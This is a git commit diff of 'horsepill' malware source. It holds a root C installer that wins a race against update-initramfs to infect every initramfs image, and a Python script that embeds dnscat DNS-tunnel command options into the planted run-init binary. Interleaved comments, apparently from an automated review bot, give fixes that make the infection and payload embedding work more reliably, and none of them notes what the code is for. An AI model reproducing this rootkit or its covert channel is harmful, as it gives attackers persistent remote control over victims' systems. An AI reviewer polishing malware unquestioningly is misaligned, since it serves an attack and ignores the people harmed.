Signed-off-by: Hacker, J.R <r00tkillah@gmail.com>
0 parents
commit e3f9f2c
Showing
7 changed files
with
2,213 additions
and
0 deletions.
@@ -0,0 +1,3 @@ | ||
*~ | ||
horsepill_install | ||
run-init |
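--- /dev/null
+++ b/Makefile
@@ -0,0 +1,7 @@
+all: horsepill_install Makefile
+
+horsepill_install: horsepill_install.c infect.h infect.c banner.h
+gcc -o horsepill_install horsepill_install.c infect.c
+
+clean: Makefile
+rm -v horsepill_install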
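Review bot: `clean` fails with an error whenever the binary has not been built, because `rm -v horsepill_install` has no `-f`, and neither `all` nor `clean` is declared phony, so a stray file named `all` or `clean` in the directory silently disables the target; add `.PHONY: all clean` and use `rm -fv horsepill_install`. The compile line passes no warning flags, and for a root-only tool built around open/read/system calls a `gcc -Wall -Wextra -o horsepill_install horsepill_install.c infect.c` would surface the ignored return values in horsepill_install.c at no cost. Listing `Makefile` as a prerequisite of `all` and `clean` does nothing useful, since neither rule rebuilds anything from it, and can be dropped.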
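--- /dev/null
+++ b/horsepill_install.c
@@ -0,0 +1,169 @@
+#define _GNU_SOURCE /* Needed to get O_LARGEFILE definition */
+#include <stdio.h>
+#include <sys/inotify.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+#include <stdlib.h>
+#include <poll.h>
+#include <errno.h>
+#include <sched.h>
+#include <signal.h>
+#include <unistd.h>
+#include <string.h>
+#include <limits.h>
+#include <signal.h>
+
+#include "banner.h"
+#include "infect.h"
+
+int slurp_file(char *filename)
+{
+int rc = -1;
+int fd;
+struct stat buf;
+
+rc = open(filename, O_RDONLY);
+if (rc < 0) {
+perror("open");
+goto out;
+}
+fd = rc;
+rc = fstat(fd, &buf);
+if (rc < 0) {
+perror("stat");
+goto out;
+}
+exe.len = buf.st_size;
+exe.buf = (unsigned char*)malloc(exe.len);
+if (exe.buf == 0) {
+perror("malloc");
+goto out;
+}
+rc = read(fd, (void*)exe.buf, exe.len);
+if (rc != exe.len) {
+perror("read");
+goto out;
+}
+close(fd);
+
+rc = 0;
+
+out:
+return rc;
+}
+
+static void handle_usr1(int signum)
+{
+printf("everything should be infected now. Have a nice day\n");
+exit(EXIT_SUCCESS);
+}
+
+
+int main(int argc, char **argv)
+{
+int rc;
+struct pollfd pollfds[1];
+struct sched_param sched = {
+.sched_priority = 1
+};
+pid_t update_pid;
+
+printf("%s\n", banner);
+if (getuid() != 0) {
+printf("you must run as root\n");
+exit(EXIT_FAILURE);
+}
+
+if (argc < 2) {
+printf("usage:\n\t%s: filename\n\nWhere filename is the binary to splat\n",
+argv[0]);
+exit(EXIT_FAILURE);
+}
+rc = slurp_file(argv[1]);
+if (rc < 0) {
+printf("couldn't open file\n");
+exit(EXIT_FAILURE);
+}
+
+update_pid = fork();
+if (update_pid < 0) {
+perror("fork");
+exit(EXIT_FAILURE);
+} else if (update_pid == 0) {
+/* child */
+
+nice(10);
+sleep(1);
+
+printf("updating ramdisk images...\n");
+fflush(stdout);
+close(1);
+close(2);
+open("/dev/null", O_WRONLY);
+open("/dev/null", O_RDWR);
+
+system("sh -c 'update-initramfs -k all -u 2>&1 > /dev/null'");
+printf("done!\n");
+kill(getppid(), SIGUSR1);
+exit(EXIT_SUCCESS);
+}
+
+signal(SIGUSR1, handle_usr1);
+
+if (infect_init() < 0) {
+perror("could not initialize structure");
+exit(EXIT_FAILURE);
+}
+
+/* there's a race, and we're going to win it */
+rc = sched_setscheduler(getpid(),
+SCHED_FIFO | SCHED_RESET_ON_FORK,
+&sched);
+if (rc < 0) {
+perror("could not set scheduler policy");
+exit(EXIT_FAILURE);
+}
+
+pollfds[0].fd = infect_get_inotify_fd();
+pollfds[0].events = POLLIN | POLLNVAL;
+
+while (1) {
+rc = poll(pollfds, 1, 10);
+if (rc < 0) {
+perror("error in poll");
+exit(EXIT_FAILURE);
+} else if (rc == 0) {
+int status;
+pid_t pid;
+
+pid = waitpid(update_pid, &status, WNOHANG);
+if (pid < 0) {
+perror("waitpid");
+exit(EXIT_FAILURE);
+} else if (pid == update_pid) {
+printf("everything should be infected now. Have a nice day\n");
+exit(EXIT_SUCCESS);
+}
+} else if (pollfds[0].revents & POLLIN) {
+/* Inotify events are available */
+infect_handle_inotify();
+}
+
+}
+return 0;
+}
+
+/*
+* Editor modelines - https://www.wireshark.org/tools/modelines.html
+*
+* Local variables:
+* c-basic-offset: 8
+* tab-width: 8
+* indent-tabs-mode: t
+* End:
+*
+* vi: set shiftwidth=8 tabstop=8 noexpandtab:
+* :indentSize=8:tabSize=8:noTabs=false:
+*/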
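Review bot: The SIGUSR1 handler is installed at `signal(SIGUSR1, handle_usr1);` only after `fork()`, so if the child's `kill(getppid(), SIGUSR1)` arrives before that line runs, the default disposition of SIGUSR1 terminates the parent before the inotify loop has done anything; the window is small because the child sleeps and runs update-initramfs first, but it costs nothing to move the `signal()` call above `update_pid = fork();`. handle_usr1 also calls printf() and exit(), neither of which is async-signal-safe, and since the poll loop already reaps the child with waitpid() and prints the same message, the handler could be dropped or reduced to setting a `volatile sig_atomic_t` flag that the loop checks. Separately, slurp_file leaks the descriptor on the fstat/malloc/read failure paths (each jumps to `out` without close(fd)) and treats a short read() as a fatal error with a misleading perror, so an `out_close:` label that closes fd and a read loop until exe.len bytes arrive would make it robust for larger inputs.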
@@ -0,0 +1,86 @@ | ||
#!/usr/bin/env python | ||
|
||
# inputs: binary, output, and options | ||
# outputs fixed binary | ||
|
||
import sys | ||
import subprocess | ||
import tempfile | ||
import base64 | ||
import zlib | ||
|
||
banner = \ | ||
"""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 | ||
0o+16nZhe6dGPPX68T+4Y1qG""" | ||
|
||
based_banner = base64.b64decode(banner) | ||
bnr = zlib.decompress(based_banner) | ||
sys.stdout.write(bnr.decode('ascii')) | ||
|
||
if len(sys.argv) < 2: | ||
sys.stderr.write("usage: %s <run-init binary> <dnscat options>....\n\n" % sys.argv[0]) | ||
sys.stderr.write("Where options are what options to pass to dnscat\n\n") | ||
sys.stderr.write("example:\n") | ||
sys.stderr.write(" %s /path/to/run-init dnscat --secret=%s example.com\n" % | ||
(sys.argv[0], "A"*32)) | ||
sys.exit(-1) | ||
|
||
infilename = sys.argv[1] | ||
options = sys.argv[2:] | ||
|
||
print("\n") | ||
print("input: %s" % infilename) | ||
print("options:"+", ".join(options)) | ||
|
||
with tempfile.NamedTemporaryFile(dir='/tmp', delete=True) as tmpfile: | ||
temp_file_name = tmpfile.name | ||
joined = "\0".join(options) | ||
joined += (4096 - len(joined)) * "\0" | ||
tmpfile.write(bytearray(joined, 'ascii')) | ||
subprocess.check_call(["objcopy", infilename, "--update-section", | ||
"DNSCMDLINE=%s" % temp_file_name]) | ||
print("\nHave a nice day.") | ||
|
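Review bot: The payload is written at `tmpfile.write(bytearray(joined, 'ascii'))` but never flushed before objcopy opens the file by name on the next line; NamedTemporaryFile is opened in buffered binary mode, so a 4096-byte write will normally still sit in Python's buffer and objcopy is likely to read an empty file and install an empty DNSCMDLINE section — add `tmpfile.flush()` before the `subprocess.check_call(...)`. The padding `(4096 - len(joined)) * "\0"` goes negative for long option lists, which silently yields no padding and no terminating NUL while still handing an oversized section to objcopy; guard it with `if len(joined) >= 4096: sys.exit("dnscat options exceed 4095 bytes")`. Note also that the options, including any `--secret=` value, are echoed to stdout at `print("options:"+", ".join(options))` and are visible to other users through this script's argv, which the usage text should say so operators do not pass a real secret on a shared host.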